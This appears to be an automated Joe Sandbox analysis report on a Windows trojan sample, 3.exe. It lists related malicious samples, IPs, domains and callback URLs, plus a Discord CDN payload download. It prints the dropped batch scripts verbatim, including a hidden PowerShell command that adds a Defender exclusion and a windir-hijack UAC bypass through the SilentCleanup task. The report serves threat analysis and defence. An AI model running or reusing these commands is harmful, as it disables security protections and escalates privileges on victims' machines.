                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:light
                                                                      Sample file name:3.exe
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                      Number of analysed new started processes analysed:33
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:1
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • HDC enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.evad.winEXE@14/5@14/5
                                                                      EGA Information:Failed
                                                                      HDC Information:
                                                                      • Successful, ratio: 34.6% (good quality ratio 31.3%)
                                                                      • Quality average: 72.4%
                                                                      • Quality standard deviation: 31.5%
                                                                      HCA Information:
                                                                      • Successful, ratio: 69%
                                                                      • Number of executed functions: 0
                                                                      • Number of non-executed functions: 0
                                                                      Cookbook Comments:
                                                                      • Adjust boot time
                                                                      • Enable AMSI
                                                                      • Found application associated with file extension: .exe
                                                                      Warnings:
                                                                      Show All
                                                                      • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                                                      • TCP Packets have been reduced to 100
                                                                      • Excluded IPs from analysis (whitelisted): 168.61.161.212, 13.88.21.125, 104.43.139.144, 20.82.210.154, 184.30.24.56, 2.20.142.210, 2.20.142.209, 84.53.167.113, 2.17.179.193, 20.190.160.2, 20.190.160.75, 20.190.160.134, 20.190.160.136, 20.190.160.132, 20.190.160.129, 20.190.160.69, 20.190.160.8, 20.50.102.62, 92.122.213.247, 92.122.213.194, 20.54.26.129, 92.122.145.220
                                                                      • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e15275.g.akamaiedge.net, a1449.dscg2.akamai.net, arc.msn.com, cdn.onenote.net.edgekey.net, www.tm.a.prd.aadg.trafficmanager.net, e12564.dspb.akamaiedge.net, wildcard.weather.microsoft.com.edgekey.net, login.live.com, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, cdn.onenote.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, ris-prod.trafficmanager.net, tile-service.weather.microsoft.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, login.msa.msidentity.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e1553.dspg.akamaiedge.net, skypedataprdcolwus15.cloudapp.net, ams2.current.a.prd.aadg.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      12:22:06API Interceptor3x Sleep call for process: 3.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      54.147.194.143Inv3063200.exeGet hashmaliciousBrowse
                                                                      • www.allerganacademy.sucks/vfm2/?k2MdtP=LmFdZ9gjDIx/1thg2qAIjzQWq3wditgwII2kAns7Fui9uD9OwA4ibKKgDMWgv+lmRomT&NZitYp=zL3h2V_pyz
                                                                      Sales Invoice NO CN 6739.exeGet hashmaliciousBrowse
                                                                      • www.atlantahawks.sucks/chue/?EzutZl=3fX08rZHUH-&EhA8R=23tAecEcPN8lPSjAKWGAYBo9TuLRqN5pN+TNZjQiP5W8VE+UFQGW1PlnZKfKox5lfqrZ
                                                                      New Order.exeGet hashmaliciousBrowse
                                                                      • www.bostonredsox.sucks/gwam/?Iry=lxg6dPe+nZwYSNNU17vceoxbNFwjbhB8pjLqYUtkOCdsIUy1dVr3af5pAhDK953TEkSh&ob30vr=S0Glx8
                                                                      INVOICE CORRECTION.png.exeGet hashmaliciousBrowse
                                                                      • www.axawinterthur.sucks/chue/
                                                                      Swift001.exeGet hashmaliciousBrowse
                                                                      • www.daytondailynews.sucks/gwam/?xVMtBLt0=dHil0CD4Vm8Yd4bFV13fVQ+sh0vKAzZyH2Hr0rX4756hSyETdw3IGIf6M/SoKAKDfxID&1bw=Lhe8eJi8jXTPbflp
                                                                      INVOICE NO 6573.exeGet hashmaliciousBrowse
                                                                      • www.axawinterthur.sucks/chue/
                                                                      Shipping Doc.exeGet hashmaliciousBrowse
                                                                      • www.cnbc.sucks/sqe3/?r6=KGMk7r6G/NNIPyfJDEPCiUC9nfst2sp0tcS4RcC9/cCtBNIGDWamBH/9pyMYJYXFNGdlq0wOpw==&rZvLVf=YL0hPBuh3Bh8NfMP
                                                                      30 percento,pdf.exeGet hashmaliciousBrowse
                                                                      • www.audiencetrust.sucks/kio8/?Yn=9EJc0yqOhJmNTeEQfP0wu5IVR3gXJ0EOIdYSOz5eK6mBCHAuY1EdvqSzCKm9Dfhfs4TryVa1KA==&mvKpc=V48DupphUTS4qDu
                                                                      Invoice Payment Details.exeGet hashmaliciousBrowse
                                                                      • www.audiencetrust.sucks/kio8/?PR-Hfnn=9EJc0yqOhJmNTeEQfP0wu5IVR3gXJ0EOIdYSOz5eK6mBCHAuY1EdvqSzCJKtfu9krN66&Cd8t=9rJx809H6RL0Cr7
                                                                      Carta de pago.exeGet hashmaliciousBrowse
                                                                      • www.audiencetrust.sucks/kio8/?_FQl64=9EJc0yqOhJmNTeEQfP0wu5IVR3gXJ0EOIdYSOz5eK6mBCHAuY1EdvqSzCJKtfu9krN66&pL3=gdnLxBrpiV
                                                                      Purchase order pdf.exeGet hashmaliciousBrowse
                                                                      • www.craftsman.sucks/nwc9/?LX9p=vufb9ZM0L2UqzR4cq9a0Vq9xTXcRUo0aJVq1+zhILIc0v3ImCtITmP0HrsJqsFS70ieg&MnZ=GXLtz
                                                                      trasferimento bancario pdf.exeGet hashmaliciousBrowse
                                                                      • www.craftsman.sucks/nwc9/?IToxs4h=vufb9ZM0L2UqzR4cq9a0Vq9xTXcRUo0aJVq1+zhILIc0v3ImCtITmP0Hrvp6jkCDqH3n&Bl=lHU80XfhY8y
                                                                      Order.exeGet hashmaliciousBrowse
                                                                      • www.arjohuntleigh.sucks/fcxy/?_R-hqJ=3fI8qP&BvTl=dg6jnflzwmowH+BmV2t3WZp/Www7NAfsI2sFRw4aqtAxAcwIjQCip5fV86QCZce1VLCV
                                                                      Purchase Order#12202011.exeGet hashmaliciousBrowse
                                                                      • www.craftsman.sucks/nwc9/?-ZeHzz4=vufb9ZM0L2UqzR4cq9a0Vq9xTXcRUo0aJVq1+zhILIc0v3ImCtITmP0Hrvl6w0OAzX3xLVqTIw==&2dB=lheDY
                                                                      TR-D45.pdf.exeGet hashmaliciousBrowse
                                                                      • www.celebrations.sucks/gnu/?X2MxIjJP=cm/vZIiV3Os0q9m3wV9NAYnR84EpEK2W/qhCxJKWCVek11jnJ1A4MINfB4PiPj5CXghE&bly=TVIpcz004Rkd
                                                                      Order specs19.11.20.exeGet hashmaliciousBrowse
                                                                      • www.chantix.sucks/nwrr/?Rxo=L6hH4NIhfjzT&cj=uGPGvmJ2JHt21s4rgOafVTq/y3pY7yC+ILF7bn+N5+KqJxZXLHbImlswjI/oLvcp6/oghs0J3A==
                                                                      DHL No_SINI0068206497.exeGet hashmaliciousBrowse
                                                                      • www.crash.sucks/mkr/
                                                                      Remittance Scan DOC-2029293#PI207-048.exeGet hashmaliciousBrowse
                                                                      • www.delonghi.sucks/svh9/?rPXTJx=CJfJI9r1cBD0WydEqOpYnndytqZZCXXpDqaNH0BqxvDchJy8UsetUmnvuiU2wxntZNx4hJVMVg==&Lvyt=BZO03Fr
                                                                      Payment Advice - Advice Ref[GLV824593835].exeGet hashmaliciousBrowse
                                                                      • www.delonghi.sucks/svh9/?UN9hLV=EhL05l&9rQhv2=CJfJI9r1cBD0WydEqOpYnndytqZZCXXpDqaNH0BqxvDchJy8UsetUmnvuiY2jhruAdxu
                                                                      81.17.18.198PI1942100023.exeGet hashmaliciousBrowse
                                                                      • www.bradforrexchange.com/3edq/?IRrDPny=jO6sWaazfWUScqk/UMZ2V9vSXHj7s0GXSNY0VsmNmZeYB4f0QdniyMTma+6l76TklIvb&Bl=lHLLrt6PJPF
                                                                      POSWM240521.exeGet hashmaliciousBrowse
                                                                      • www.nononenseforex.com/m3rc/?CRi=sQslGx3wRkkS8QwcsHXSsetwWwy5zDYh0aNt3+ZE5+5eF57RcdKe2rWRFuGVJFeZl5Wh&QZ3=DnJpqlx8pzo8Q0
                                                                      PO.exeGet hashmaliciousBrowse
                                                                      • www.healtybenenfitsplus.com/u8nw/?YrCLWRfh=6ud/dqIydDQUuBxLTd+61jR+UOTUyrr5/cODbe6ZCgy6zmegus8kaEMTI16gihWe1lhH&Dzut_N=3f-4
                                                                      PO09641.exeGet hashmaliciousBrowse
                                                                      • www.basictrainningphothos.com/or4i/?UL=ER-POL&r6t0=kC1u0IXPsBjzVnGc1WAO7pfcEkTuC4G65QDl1LxxWxvdcIk0AsappLtc+Rt99gFPIW/ptGYUxQ==
                                                                      cks.exeGet hashmaliciousBrowse
                                                                      • www.healtybenenfitsplus.com/u8nw/?f0=6ud/dqIydDQUuBxLTd+61jR+UOTUyrr5/cODbe6ZCgy6zmegus8kaEMTI12ZuA6eij9WcYoi0w==&6l6x=E4ClVdU
                                                                      PO20210429.xlsxGet hashmaliciousBrowse
                                                                      • www.hawkspremierfhc.com/8u3b/?Mz=ltx0qfi0x45&WBZXQ8j=3iKzWC9LZujcEqPpbQv6LxvAb3gxPt2YPK6xKboPPZ94xOFNl7wSmfmIFDBjFiSqNNfP+A==
                                                                      s6G3ZtvHZg.exeGet hashmaliciousBrowse
                                                                      • www.moretuantired.com/iu4d/?J6A=t0/ehB6/LVvHYU10SpQGBhUGrinUOeav3QqKXry454rcMit/5rlSGcY6Hhw179fg+WUV7s8SGg==&uVjL=M6NHp
                                                                      4oItdZkNOZ.exeGet hashmaliciousBrowse
                                                                      • www.xn--ol-xia.com/hx3a/?yvLp6=o+3wYjNifdE6FKE0bOiznyo8jGn7vjVVrJpNZHKkq7PaCapngpRQoMcVskl66UoDGo5EztP+UQ==&6l=t8eTzfA8rB7py
                                                                      gqnTRCdv5u.exeGet hashmaliciousBrowse
                                                                      • www.ololmychartlogin.com/p2io/?K81d7=2q6D4S4IYN7aWdcEo+dmfNOnFlWkohYFDzpy6Q1cDMIvB7dycn+zvuYm9Ot1G4m5E5eG&uTrL=Apdlbf
                                                                      newordermx.exeGet hashmaliciousBrowse
                                                                      • www.xn--ol-xia.com/llc/?bn=6gTrs3WlX/dQ4h1iHI1SnxJQFS0nsC7P3gjdYD5m5wbZexpWY5yyX5EF1urN19KpUayT&vTd8F=LJBxmfw
                                                                      MV WAF PASSION.exeGet hashmaliciousBrowse
                                                                      • www.moretuantired.com/iu4d/?EZA0pp=t0/ehB6/LVvHYU10SpQGBhUGrinUOeav3QqKXry454rcMit/5rlSGcY6Hic2nNTYz3pD&GzrX9=Axo834d
                                                                      9tRIEZUd1j.exeGet hashmaliciousBrowse
                                                                      • www.thesahwfam.com/aqu2/?5j=5EjXvdr19C9mZVkY3fKTgvDOgP0S6WDmsKJe/OA2LcJULTMy4Vts0y1eMnfuBzO+T46m&_P=2dhtaH9
                                                                      IMG_7189012.exeGet hashmaliciousBrowse
                                                                      • www.comriv.com/mt6e/?DVBl=FwXaSa09vNWpKPjUESqBerftMc+dq/hFoZPV5cdNpA4Dw8Ua5k46pvZmfTcPNIMbsRBT&T8SH=pFNpKT28jFN454KP
                                                                      TBKK E12101010.xlsxGet hashmaliciousBrowse
                                                                      • www.stonescapes1.com/de92/?rDK4=XrxlCh&SH6=FMDFc6rOlp10jaqop6r3BpbflKlZCzzEN1iblkluZIOvebj5bOK3jo1m1AppDhOD0Sh+SQ==
                                                                      PO20210120.exeGet hashmaliciousBrowse
                                                                      • www.morkiehouse.com/knb/?5jR=5f4+S7dOxIgdr5BGwWsz6ruKwi5Cwc4O4q4+fZzwW2WbMhIr+9/Ek3SgS9//XL2PJatT&cxol4=yhvxYFE8aN4
                                                                      SKM_C221200706052800n.exeGet hashmaliciousBrowse
                                                                      • www.comunityassn.com/s9zh/?jrTDhRz=tknWlnMldXC7iCBNErlol2ZWcFkzI66RNwK0SX0HwmntnkBHipaMqEQDNLo3y97V5yepxxmpfQ==&J2JDYn=DxoPetRhujMT
                                                                      SHEXD210117S_ShippingDocument_DkD.xlsxGet hashmaliciousBrowse
                                                                      • www.stonescapes1.com/de92/?gb20XB=FMDFc6rOlp10jaqop6r3BpbflKlZCzzEN1iblkluZIOvebj5bOK3jo1m1AppDhOD0Sh+SQ==&pBU=HzuD_
                                                                      Yw5acDrhKd.exeGet hashmaliciousBrowse
                                                                      • www.stonescapes1.com/de92/?FD=Txo8n6BX_BmT&vBZ=FMDFc6rLlu1wjKmkr6r3BpbflKlZCzzEN16L5n5vdoOueqP/ceb71sNk2lFVYB6w7T0O
                                                                      ant.exeGet hashmaliciousBrowse
                                                                      • www.wwwmmcguard.com/94sb/?8pMt5xHX=RFLrXxcYp0hG0BbLPC4a8F4Mq8oCwTW9r4roPbGrPgAFBAFkro9ZoKsd4hZYJcmKRPJ1&GzrT=Wb1LdRq8x
                                                                      http://gmai.comGet hashmaliciousBrowse
                                                                      • gmai.com/

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      cdn.discordapp.comNew Order PO2193570O1.docGet hashmaliciousBrowse
                                                                      • 162.159.134.233
                                                                      crt9O3URua.exeGet hashmaliciousBrowse
                                                                      • 162.159.135.233
                                                                      qdAbNSGIbq.exeGet hashmaliciousBrowse
                                                                      • 162.159.129.233
                                                                      o8RYFTZsuU.exeGet hashmaliciousBrowse
                                                                      • 162.159.129.233
                                                                      MrjC4jkPL8.exeGet hashmaliciousBrowse
                                                                      • 162.159.129.233
                                                                      p8Wo6PbOjL.exeGet hashmaliciousBrowse
                                                                      • 162.159.130.233
                                                                      Lista e porosive.exeGet hashmaliciousBrowse
                                                                      • 162.159.129.233
                                                                      Sleek_Free.exeGet hashmaliciousBrowse
                                                                      • 162.159.133.233
                                                                      MESCO TQZ24 QUOTE.exeGet hashmaliciousBrowse
                                                                      • 162.159.134.233
                                                                      64gfv9wUm1.exeGet hashmaliciousBrowse
                                                                      • 162.159.134.233
                                                                      DPSGNwkO1Z.exeGet hashmaliciousBrowse
                                                                      • 162.159.134.233
                                                                      nU8kVKVAc8.exeGet hashmaliciousBrowse
                                                                      • 162.159.134.233
                                                                      3Dhjb2xzpW.exeGet hashmaliciousBrowse
                                                                      • 162.159.130.233
                                                                      f2hwO1fUs5.exeGet hashmaliciousBrowse
                                                                      • 162.159.135.233
                                                                      New order_doc.exeGet hashmaliciousBrowse
                                                                      • 162.159.133.233
                                                                      New order_doc.lzhGet hashmaliciousBrowse
                                                                      • 162.159.134.233
                                                                      TT Copy,xlsx.exeGet hashmaliciousBrowse
                                                                      • 162.159.130.233
                                                                      teX5sUCWAg.exeGet hashmaliciousBrowse
                                                                      • 162.159.130.233
                                                                      teX5sUCWAg.exeGet hashmaliciousBrowse
                                                                      • 162.159.135.233
                                                                      POD0608.docGet hashmaliciousBrowse
                                                                      • 162.159.134.233

                                                                      ASN

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      CLOUDFLARENETUS01ekkRSMzb.dllGet hashmaliciousBrowse
                                                                      • 104.20.185.68
                                                                      Invoice_OS169ENG 000003893148.exeGet hashmaliciousBrowse
                                                                      • 172.67.188.154
                                                                      Purchase Order.exeGet hashmaliciousBrowse
                                                                      • 172.67.188.154
                                                                      INVOICE.exeGet hashmaliciousBrowse
                                                                      • 104.21.29.70
                                                                      Request Quotation.exeGet hashmaliciousBrowse
                                                                      • 104.21.19.200
                                                                      8BDBD0yy0q.apkGet hashmaliciousBrowse
                                                                      • 172.67.169.41
                                                                      Shipment Invoice & Consignment Notification.exeGet hashmaliciousBrowse
                                                                      • 172.67.188.154
                                                                      8BDBD0yy0q.apkGet hashmaliciousBrowse
                                                                      • 172.67.169.41
                                                                      w4X8dxtGi6.exeGet hashmaliciousBrowse
                                                                      • 172.67.163.99
                                                                      St3aq2ELIJ.exeGet hashmaliciousBrowse
                                                                      • 104.21.2.30
                                                                      KY4cmAI0jU.exeGet hashmaliciousBrowse
                                                                      • 172.67.206.33
                                                                      w1iSiwLXiV.exeGet hashmaliciousBrowse
                                                                      • 172.67.188.154
                                                                      TKeRmCuiit.exeGet hashmaliciousBrowse
                                                                      • 172.67.188.154
                                                                      c71fd2gJus.exeGet hashmaliciousBrowse
                                                                      • 172.67.222.38
                                                                      BrBsL8sBvm.exeGet hashmaliciousBrowse
                                                                      • 172.67.188.69
                                                                      New Order PO2193570O1.docGet hashmaliciousBrowse
                                                                      • 162.159.134.233
                                                                      Proforma Invoice.exeGet hashmaliciousBrowse
                                                                      • 172.67.188.154
                                                                      00010200390_0192021.pdf.exeGet hashmaliciousBrowse
                                                                      • 172.67.188.154
                                                                      Payment Advice.pdf.docGet hashmaliciousBrowse
                                                                      • 104.21.19.200
                                                                      Urgent Contract Order GH7856648,pdf.exeGet hashmaliciousBrowse
                                                                      • 172.67.188.154
                                                                      PLI-ASCHscan copy.rr1.exeGet hashmaliciousBrowse
                                                                      • 81.17.18.196
                                                                      Julie.randall Completed REFERRAL AGREEMENT 60926.htmlGet hashmaliciousBrowse
                                                                      • 179.43.134.182
                                                                      03062021.exeGet hashmaliciousBrowse
                                                                      • 81.17.18.197
                                                                      as.exeGet hashmaliciousBrowse
                                                                      • 179.43.140.150
                                                                      Brett.sutton REFERRAL AGREEMENT 03, Jun 2021 3444.htmlGet hashmaliciousBrowse
                                                                      • 179.43.134.182
                                                                      YH6Zy2Q5e2.docGet hashmaliciousBrowse
                                                                      • 179.43.140.150
                                                                      Payment_Advice.exeGet hashmaliciousBrowse
                                                                      • 81.17.18.196
                                                                      Swift copy_9808.exeGet hashmaliciousBrowse
                                                                      • 81.17.18.197
                                                                      E4T88Y4IMi.docGet hashmaliciousBrowse
                                                                      • 179.43.140.150
                                                                      1092991(JB#082).exeGet hashmaliciousBrowse
                                                                      • 81.17.18.194
                                                                      Makbuz kopyas#U0131 onayland#U0131 5.26.21.exeGet hashmaliciousBrowse
                                                                      • 81.17.18.197
                                                                      PI1942100023.exeGet hashmaliciousBrowse
                                                                      • 81.17.18.198
                                                                      POSWM240521.exeGet hashmaliciousBrowse
                                                                      • 81.17.18.198
                                                                      KJN55hQKh2.exeGet hashmaliciousBrowse
                                                                      • 141.255.162.34
                                                                      TNT AWB N0 - 6278216733.exeGet hashmaliciousBrowse
                                                                      • 46.19.137.116
                                                                      Purchase Order.exeGet hashmaliciousBrowse
                                                                      • 81.17.18.194
                                                                      Patch.exeGet hashmaliciousBrowse
                                                                      • 179.43.140.174
                                                                      15%.exeGet hashmaliciousBrowse
                                                                      • 179.43.140.174
                                                                      invoice.exeGet hashmaliciousBrowse
                                                                      • 81.17.18.194
                                                                      malicious.jsGet hashmaliciousBrowse
                                                                      • 190.211.254.101
                                                                      AMAZON-AESUS444890321.exeGet hashmaliciousBrowse
                                                                      • 35.169.40.107
                                                                      8BDBD0yy0q.apkGet hashmaliciousBrowse
                                                                      • 3.213.149.159
                                                                      8BDBD0yy0q.apkGet hashmaliciousBrowse
                                                                      • 3.210.126.214
                                                                      c71fd2gJus.exeGet hashmaliciousBrowse
                                                                      • 107.23.214.167
                                                                      E1a92ARmPw.exeGet hashmaliciousBrowse
                                                                      • 34.205.91.18
                                                                      crt9O3URua.exeGet hashmaliciousBrowse
                                                                      • 34.205.91.18
                                                                      E1a92ARmPw.exeGet hashmaliciousBrowse
                                                                      • 34.205.91.18
                                                                      triage_dropped_file.dllGet hashmaliciousBrowse
                                                                      • 23.23.104.250
                                                                      o53icSdh9N.exeGet hashmaliciousBrowse
                                                                      • 34.202.33.33
                                                                      qdAbNSGIbq.exeGet hashmaliciousBrowse
                                                                      • 52.204.109.97
                                                                      DNPr7t0GMY.exeGet hashmaliciousBrowse
                                                                      • 54.85.86.211
                                                                      omh.dllGet hashmaliciousBrowse
                                                                      • 23.21.205.229
                                                                      fTxhRIDnrC.dllGet hashmaliciousBrowse
                                                                      • 34.201.169.54
                                                                      Letter 09JUN 2021.xlsxGet hashmaliciousBrowse
                                                                      • 54.85.86.211
                                                                      XumsQCALnX.exeGet hashmaliciousBrowse
                                                                      • 54.235.190.106
                                                                      MV SHUHA QUEEN.docxGet hashmaliciousBrowse
                                                                      • 54.83.52.76
                                                                      MV SHUHA QUEEN.docxGet hashmaliciousBrowse
                                                                      • 54.83.52.76
                                                                      Docc.htmlGet hashmaliciousBrowse
                                                                      • 52.44.21.50
                                                                      ManyToOneMailMerge Ver 18.2.dotmGet hashmaliciousBrowse
                                                                      • 34.236.65.196
                                                                      Sleek_Free.exeGet hashmaliciousBrowse
                                                                      • 52.2.188.208

                                                                      JA3 Fingerprints

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      37f463bf4616ecd445d4a1937da06e19audit-1133808478.xlsbGet hashmaliciousBrowse
                                                                      • 162.159.135.233
                                                                      tXkin8g4sy.exeGet hashmaliciousBrowse
                                                                      • 162.159.135.233
                                                                      xGrfj8RvYg.exeGet hashmaliciousBrowse
                                                                      • 162.159.135.233
                                                                      my_attach_82862.xlsbGet hashmaliciousBrowse
                                                                      • 162.159.135.233
                                                                      document-47-2637.xlsGet hashmaliciousBrowse
                                                                      • 162.159.135.233
                                                                      logo.png.exeGet hashmaliciousBrowse
                                                                      • 162.159.135.233
                                                                      document-47-2637.xlsGet hashmaliciousBrowse
                                                                      • 162.159.135.233
                                                                      Fax_Doc#01_5.htmlGet hashmaliciousBrowse
                                                                      • 162.159.135.233
                                                                      wa71myDkbQ.exeGet hashmaliciousBrowse
                                                                      • 162.159.135.233
                                                                      Current-Status-062021-81197.xlsbGet hashmaliciousBrowse
                                                                      • 162.159.135.233
                                                                      logo.png.exeGet hashmaliciousBrowse
                                                                      • 162.159.135.233
                                                                      3F97s4aQjB.xlsxGet hashmaliciousBrowse
                                                                      • 162.159.135.233
                                                                      WcCEh3daIE.xlsGet hashmaliciousBrowse
                                                                      • 162.159.135.233
                                                                      ATT00005.htmGet hashmaliciousBrowse
                                                                      • 162.159.135.233
                                                                      kxjeAvsg1v.exeGet hashmaliciousBrowse
                                                                      • 162.159.135.233
                                                                      VSA75RUmYZ.exeGet hashmaliciousBrowse
                                                                      • 162.159.135.233
                                                                      iX22xMeXIc.exeGet hashmaliciousBrowse
                                                                      • 162.159.135.233
                                                                      QWkt5w3cO2.exeGet hashmaliciousBrowse
                                                                      • 162.159.135.233
                                                                      #U260e#Ufe0f Zeppelin.com AudioMessage_259-55.HTMGet hashmaliciousBrowse
                                                                      • 162.159.135.233
                                                                      vTtOheCXBQ.exeGet hashmaliciousBrowse
                                                                      • 162.159.135.233

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\Public\KDECO.bat
                                                                      Process:C:\Users\user\Desktop\3.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):155
                                                                      Entropy (8bit):4.687076340713226
                                                                      Encrypted:false
                                                                      SSDEEP:3:LjT5LJJFIf9oM3KN6QNb3DM9bWQqA5SkrF2VCceGAFddGeWLCXlRA3+OR:rz81R3KnMMQ75ieGgdEYlRA/R
                                                                      MD5:213C60ADF1C9EF88DC3C9B2D579959D2
                                                                      SHA1:E4D2AD7B22B1A8B5B1F7A702B303C7364B0EE021
                                                                      SHA-256:37C59C8398279916CFCE45F8C5E3431058248F5E3BEF4D9F5C0F44A7D564F82E
                                                                      SHA-512:FE897D9CAA306B0E761B2FD61BB5DC32A53BFAAD1CE767C6860AF4E3AD59C8F3257228A6E1072DAB0F990CB51C59C648084BA419AC6BC5C0A99BDFFA569217B7
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview: start /min powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & exit
                                                                      C:\Users\Public\Trast.bat
                                                                      Process:C:\Users\user\Desktop\3.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):34
                                                                      Entropy (8bit):4.314972767530033
                                                                      Encrypted:false
                                                                      SSDEEP:3:LjTnaHF5wlM:rnaHSM
                                                                      MD5:4068C9F69FCD8A171C67F81D4A952A54
                                                                      SHA1:4D2536A8C28CDCC17465E20D6693FB9E8E713B36
                                                                      SHA-256:24222300C78180B50ED1F8361BA63CB27316EC994C1C9079708A51B4A1A9D810
                                                                      SHA-512:A64F9319ACC51FFFD0491C74DCD9C9084C2783B82F95727E4BFE387A8528C6DCF68F11418E88F1E133D115DAF907549C86DD7AD866B2A7938ADD5225FBB2811D
                                                                      Malicious:false
                                                                      Preview: start /min C:\Users\Public\UKO.bat
                                                                      C:\Users\Public\UKO.bat
                                                                      Process:C:\Users\user\Desktop\3.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):250
                                                                      Entropy (8bit):4.865356627324657
                                                                      Encrypted:false
                                                                      SSDEEP:6:rgnMXd1CQnMXd1COm8hnaHNHIXUnMXd1CoD9c1uOw1H1gOvOBAn:rgamIHIXUaXe1uOeVqy
                                                                      MD5:EAF8D967454C3BBDDBF2E05A421411F8
                                                                      SHA1:6170880409B24DE75C2DC3D56A506FBFF7F6622C
                                                                      SHA-256:F35F2658455A2E40F151549A7D6465A836C33FA9109E67623916F889849EAC56
                                                                      SHA-512:FE5BE5C673E99F70C93019D01ABB0A29DD2ECF25B2D895190FF551F020C28E7D8F99F65007F440F0F76C5BCAC343B2A179A94D190C938EA3B9E1197890A412E9
                                                                      Malicious:false
                                                                      Preview: reg delete hkcu\Environment /v windir /f..reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "..schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I & exit..
                                                                      C:\Users\Public\nest
                                                                      Process:C:\Users\user\Desktop\3.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):9
                                                                      Entropy (8bit):3.169925001442312
                                                                      Encrypted:false
                                                                      SSDEEP:3:v6Sn:pn
                                                                      MD5:B34CDA3AD70900BC497BBF541CA56028
                                                                      SHA1:F60AF6A109961F618F07B4859765551C83C5BC29
                                                                      SHA-256:52528941C375DA2A333D86CB4D35BED7B616CFA9B540E4D1C3969D5F10DBD872
                                                                      SHA-512:97343B6470D00EAB34AC932AFB6C8F8B7B4B8EFFD569E4854CA6EB4CF9DD18188C339070595CF10D56963EF63F94073B1A73FA6C15FB4023B936E249E58148BD
                                                                      Malicious:false
                                                                      Preview: Rvsqdib..
                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\Rvsqdibldhhwoyydhsqrllstcbdszox[1]
                                                                      Process:C:\Users\user\Desktop\3.exe
                                                                      File Type:data
                                                                      Category:downloaded
                                                                      Size (bytes):278528
                                                                      Entropy (8bit):7.587141305649266
                                                                      Encrypted:false
                                                                      SSDEEP:6144:oFOVTV/0na+54rRldsdjInoHYKss/z/wT23rZWG48Ds:oATVsnarXsCnuYDIz/O27ZLDs
                                                                      MD5:3B2E70B2C34A9CCD9C0CC8C3259D4684
                                                                      SHA1:5D526A1F60C98D3B0C0BE016CC13A15A281B0665
                                                                      SHA-256:A4264F980716E7401453A763B259569E51E94D9B43AA32B5F07987D2EB44A798
                                                                      SHA-512:8647C0D8981B034052AF03055594A676BCCA089F6FF1CC5A62CCFD551A0260A5C68B8942AEDDCB05B381FB74506AE0BBBF54F69D0B41A2C6FD2B02BFD4D6A8F2
                                                                      Malicious:false
                                                                      IE Cache URL:https://cdn.discordapp.com/attachments/848561010100273222/851346956201623552/Rvsqdibldhhwoyydhsqrllstcbdszox
                                                                      Preview: ~)........@.00..............................................2.....P.:.R.2..R__#7...?A..A....C.1..A.=.=3.A.=d.>..h.........................................................................................................................................v...2..J-...........].<2.J.?2........gC2......O2............................../............2..................................o2..@...2.Y....................2..N..................................................................................t..v....=2......?2..................../.r#r....@...O2......E2........................Z...._2......U2..................3.C....@...o2......U2.................A.;.....N....2......e2..................A.A....Y...2..[...2..............................2......2.........................................................................................................................................................................................................................................

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):6.215488497688755
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.24%
                                                                      • InstallShield setup (43055/19) 0.43%
                                                                      • Win32 Executable Delphi generic (14689/80) 0.15%
                                                                      • Windows Screen Saver (13104/52) 0.13%
